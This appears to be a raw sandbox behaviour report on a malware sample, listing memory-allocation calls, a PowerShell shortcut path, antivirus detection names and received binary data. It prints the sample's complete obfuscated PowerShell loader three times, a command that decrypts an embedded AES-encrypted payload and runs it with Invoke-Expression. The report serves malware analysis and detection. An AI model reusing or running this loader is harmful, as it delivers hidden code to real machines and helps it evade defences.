heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02057000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02058000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02059000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 944
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
cmdline powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI78788979119683530985530790090406CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIxnPEzukRsRmzojEc2IqrsP6SzVylf4Lg1SsmmstVoJpV85MKYUwolNJkrLCOU5mJEMqMV+12DiEJ79pZ9yIaWkX01VWnCHXhB3HYMrMthz9dx3qVZG5quEhCgfQ6Zph6Ax6Lf4RH+PZR7dkdCwyLFaWfarqe/MQK49YgyXHqf8xybMvrfjAGQmSb8+3rz+o3mw40bVJxQ6m8tQdAkw6sCVRflXiNsvVPXd9z2Xi0ad/BdcF037OL0GwjtXRs4HTNhF7nzo4Ed5q/h3dLLIMSn2J+w2IWk+U5mgaGh75IlTQeR4SwCUwM45ySFmY56HoQ3vHGf2N49OpVzffLKifgubFQg5jD8FvJXO8aoVjOSTJCW69aOoGZTyK5J0HIGG5gJvjVmBk6igl+L+8yDRg781ddUNbUdYL922Qeo/CBrATzZ7nIcK64Yvri5jOiE57sC7hW5qPZlABLBL4Es2RDH83nRO7hflBwRplmsQrhQE08BcAtC5/H/dUM/kvdtXeeOX8Tuu7lESLHAr56TF9GhVOHA8prMr/tS2ZR0hyZfm7Bu3Tmdu+x2fwwzem8z+mBAmD/XKsxM6sTzoC3n1Ae0JVe73Zercxs+BmJJpbgXjZ+Q9u57NNqoS6U2CdC72jMJxHKDE4+VSNlWGl5O7OlHVD7o3Qsvf69qB0gqacfvTobcTSWza0EJF9kQ+5z3ZIN4RDUiT7O+w3Uqio7O7mnXWYIN/7LtXn62LFIRF3KVPy/5e+G9c8TEWAjIuK16XOWGMdYryMqIXHJ3DJ7W8AUmlfwhUaV8fAeSoTOsK9/b9nBvoFbAx5+hsd0hyHmpInkBC2DS/badEfD6PQJYrYcjkbGi0RoNniC2jHpPPdWIvIlnj2s8yLFbY35KLplcF4i3yVyXJ5kbYsqU3WF61Q38O8XXyiS2NXcTWzwb8zvTWXKUc8sjaWjj35wSYokblJCUj2oyo2B867XR0zuJ5ksaLRPpHeo9i8gtJ0FS5wmJ0XoFxiBz5+4fqoH7wQvJCQRXOb6f27I25twnb2ObtgolO3WOhl0izHAioF+1H3wM0sVxYtpu5z57tcag6+v30kNNbaBzxG+tzD5ToOrfi6Tce9xTGxoPOyFIIJJOJZGzdk4+HSKzeN9fZHZQXV8aKZDPujY3w9+PjqbvvKoSuY4psjbQuBgyGcFtkTHImmPuptN8Olz+SkUIa6Kcui5IEhw705+l8XTPBh3pewFIhVmN03zvUALvhifDR5gzFw3dgrcWS3k5q6w+21FcfYm4h9Rwx8pqfh5aEbMHkAsAhUbfwnDKj0Bzvd7b6h/aeqdx4BtT4PyDGMyDSZHQqQUtx5o2A/sy7aoFXDUGZw3QV3NebZhx2Lzm6xnxF43aMw22YC8GLh2Dks7+J5AnS+B3cZu3E5Mr1FIaQ/ekLxwOA/T8A==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
filepath: powershell.exe
1 1 0
Skyhigh BehavesLike.VBS.Dropper.dp
Symantec ISB.Downloader!gen81
Kaspersky HEUR:Trojan.Script.Generic
Kingsoft Script.Dropper.vbs.2023281
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received ¸5’6½‘ßmÿæÉtH÷ÈOtþ¸‘ÔAlFæ ‚O°8Ç­ÍÇ!5ðÿ՗›V¬B´.TñÎßï‹F!•”Š%ÔeuClŒ°0ñ‰tÁ"†þcìp:dfÕDQÁ”~¸Üª¯‚¢·wù`´F$×F’*ñ ªùàj2T´¬Y¸ŽÝxÉ)*È1 Üádr²µŠ^ß®%ˆ™÷)M ï€e!¢$¸Éã¾ )fq¹˜žMšÀɬæ]À)k±Üó“$è°Hê³é՘4’^ëãu÷ùà¾äáՌ”ƒ1¨Ð¶™\Û[]›ätÓ¢„p8œ>é/w›ÁÏᥝJ?©ºƒ_ßY‘iBÑí’ì<Û;zq}o9<<©>c ï]p¿sÓ¬ûC†R¿ ÿ̈́Ó,3‰r“é݇ŽÚI©¥,ù`eϦ¯¡½=qŸZ±á ~£¿uÚîFà='ÓÓ/á‚7×3Ä)QZ¹®ã¶֞0—r6Žù•âû"Ói ¡—ÕóÍ+ěVgxØ_&/Îæ`b–ä÷¼j+ÜéjÆãG鋍îµí›§Ó¿‡BÌ)••ÀAß{XuR*©»å òi–P^ˆ7ûç?†¹yA™Jî%{bRÆèÛX“^øÉ ¬îÜ(Öiè5zX¼:PAGæØu9ˆWkW\;²}Ë`1}ÃåXÒk›I!+êR:ØN£ï™ '1…ÓNñoXœ¨îÏ¯3²¨â—X.Iøœº!bA W¾I¥}^ D‡“É? ‹M¨œ¯–Œ×Â××I*,M+-°!@?ÍY—S¥€@ˆ£oíOëŒéuPO§X¤…DËÖ^Ýð<ëFÑÇ!¥x5ß-ïFÀ0j«í›~#¡mB,‘DªŠ„Qec˜¾N¢¤@–GQߧ¶Ñ<HI¢jû,º™¤%O¾›Jú¡´U÷ä}26î„Æçl‘µ^1_ƒ«-·¤ºsܘ¢'h x$gŒû8|¿Ó£F7jqÔzN{—ó$’K4íR{àg˽ŽÓ´ì2}A¼4º]Aˆ¨>¥ü\ഉ.ݲ8nÀàaÆ}¨Ö_-å #· ‰J„xÉGÞ¡ò8ûÍ›ín¬LÅwFª¤{íSý3?]2Gâr̬Vx^ïÙNŸjbò>鰑¸1#þ_í‡oHáŠB ;(,¿ÅñušÅ‹S=ùmb1í@ž«I Ó´C"°b9ä`!¦ÕjµSÅ7mÍü³IÐ$!lÕñ•‘dWª¥G·ÈA$tÀŽ01<JYb’ bzKÚîkÇ™¸²rC ÂІ`O'±É’ƒKDíc‚AýpQ!Ri¯Úñ9ö²–ŘP¾ØX…©»1÷öÀÌ¡fÝæ,ôÑ/› .¤°ãé‹:<LÍ*‘ÏÃ)XZœÙ>Ÿ–Œ°‚ܯBG8á77¬nød,êP‹Zâ†rC ֘ʑæñ˜âV YB‹#ßx´é­¦Û°ÃG¢VR0 ÖûdˆwM¼Èܞ:m#Y·×‡Fšk#“ÓéVW X¨Žpژ‹M Xš¢óđ6ê%F‘‰¿OHsfþ™YÐ2meäd22ÌAsð¼º[ ’aÐÖú}:9>ŸRô8Ük!C»¨é•ŒRCß,2Pmf,zü0/¦%¤4;XȖ"ÑôRËÀ¬ÔDVEò؏FÓñøæc§Ô7<T{à]±½X…qðÔOº%C7=1IcÝ8rMm¾1Ȕ »ÒG$ö²ÂŠ›ÃÑ>–(© Ž‰úÃê%fØÈã £B »éšP¹õ2š•V!C]ão•12SÓÕ)hITlÒĬþ·R½°º<jŀ`Jõ0:d ‡4z‚1÷”4&ґ¹ï‘€®›L‚–\àµ:?»>øNÕºÛíDuƒcpÒ}ÎR¶A`lõÀ@\€ÉÃím£sL^ ]CƒÓ°ÂêÀ ¼ç`ꃭŒš—®Ò}ò$h¢ ©´ß_W8»±:• µÁÀp®å$Ù5‚dZ[5ۜºçA³_1f×Hò)3Yä8Ë rD¨†ã‹F–òÏâííŽD«&™œ¨R¦öœ]õ ´D¦@†²hÓ$²Ôƒ•ugPàÀXÖՓN®A=hôÀ·žY¶b¿,²&蝂‘C¸ÄøiH¾¸ûH°0I´0èH;SÈË¢@|2ԕ%½°Ú½b*©˜^s5Q<ċHÁöæ°/¯¦PãÒzÄ¡ˆî { Õ:t*Ŗï­æv¢6Hƒ¡ôƒÛ°Àb-ˆ dW‚3»#pÌo¹¼í;†B§’G …RŒA;NI,Š‹´]ö¬'›"¶„·np{YPm&ÇPqˆØ• Æ꼆Vh]DD8+g߃…HåH̛9£ø³¤û·Žá»·¾ &)Y[p= àtM¹JÑ}…ãÓê —xUéUdà ÑÌÓ;ï¿p8Íh¾ÏkSÿ²\V5p“îz7¶†•£ƒÂ• 6æz,ÈQ=ùø¸ðý:’…Äæè/{tùãz]‹ eWÒȪ„(¨èžOø½ó‹—ž•|Ý"߈ë"¤uü]0<ï‰øÍc5ˆ@¶ÝÅa˜OT, >ª¬ö’i<Ö,ÒéwªµÞ®.x5ß<ÌúY¼³b KK:zׯ=(ï–Ü+ž˜uÐÎG ¾—:_þl²h§SLÐU_3§þ¬Ã*­ÖXc× º9l±0y¯=?õa’VQOv©ÓÿVô˜ó•*‘­òoßò¥ꊾ©þG iep´;OBfAü΁\­`tÉò…ƒŽ $ŠKƒå÷„ÿՒÚyV ÌÑUŽU'¯°?ëœb‰¥€ŽµÉìk´kÏ8ðÑÊÒQ“M´ÇÞÿVTè¥fUiÀ³ÿϏ§üß ("¬e6õoÚ±Á¥–…<ÿùtéÓüYË£œò$ÓÛ÷éÿ«^òÌê;cº_ :؞YG¥‹–•zü"ºžŸžNŸÃgÖ´ˆd‰Q@.âEmƒÜ€~¥:y…`ŽH“G§  ,6¨< ÿkã×¹!•âY ßƋˆÔYT[¾'¯Èâ­´J@¼ÐÕ¬ÈшÕv®ù”3rĖ®Éä~Câ°ÓHƒ™tô{yéÿ«2)¹&¶4î%Ň*»ÈçD×÷I w¾OÿoOýY ¤•cА¾Ó#~°†Yõ #C$áMÍ+ÐXÀ³þ FDZƒ;Y¦‰UP»´ÌlØVïӓù{b §–Hw£B<ܪ¤ˆ,2I"©%¡ .ê'O£s€ê™¼¥óD.(iò õ“\žÝ33\…g`X±âٚÏ÷¯žs»6œ!$ªG<s_ž,x £É'ƒƒš¾éR3)çå™J,æçéaÔE(–#! 6û HušR¡iHoÃuW™ùÝ#ÚÀ·,:æäÞ‘2ƒ´°´]Åg™“I8Dl,…àUŸåxÕØm¡öÕß ¸Äâö³0Ú·D^M¦o%¶Ú–'su ¡ê±³$ãp jTUœ‰ÎŒI#"Þ’ª_‡8¾›WjØo’Ø7pÐ(A ÕgŸžf™nÁ끬ÚÅõ¤4Ò7`†;#;È7{_ñe4­‰€ Hxº¬‰N¦P9e®kœ Å 